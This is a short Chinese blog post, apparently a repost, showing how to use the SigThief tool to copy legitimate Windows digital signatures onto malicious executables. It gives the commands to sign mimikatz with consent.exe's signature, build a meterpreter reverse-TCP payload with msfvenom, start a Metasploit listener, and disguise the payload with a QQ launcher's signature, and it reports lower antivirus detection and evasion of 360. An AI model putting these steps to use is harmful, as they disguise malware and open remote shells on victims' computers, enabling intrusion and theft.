数字签名混淆

Github

https://github.com/secretsquirrel/SigThief

Sigthief是劫持合法的数字签名并绕过Windows的哈希验证机制可以被红队用于将恶意二进制文件和PowerShell脚本与本机操作系统文件混合,以逃避检测并绕过设备防护。

1.首先是Github上的实例 :

从一个二进制签名,并将其添加到另一个二进制文件

python sigthief.py -i c:WindowsSystem32consent.exe -t mimikatz.exe -o mimi.exe

借用msfvenom的payload

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.3.5 LPORT=4445 -f exe > lonsheng.exe

  

启动监听模块

use exploit/multi/handler
set LHOST 192.168.3.5
set LPORT 4445

  

 cd 进数字签名混淆的文件然后

python sigthief.py -i E:QQBinQQScLauncher.exe -t C:UsershackerDesktoplonsheng.exe -o jiu.exe

  

然后运行jiu.exe可以看见返回了一个meterpreter

然后扔到http://r.virscan.org查毒

明显降低了查杀率而且还能过360

我们看看jiu.exe和longsheng.exe的对比

【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/haq5201314/p/8213906.html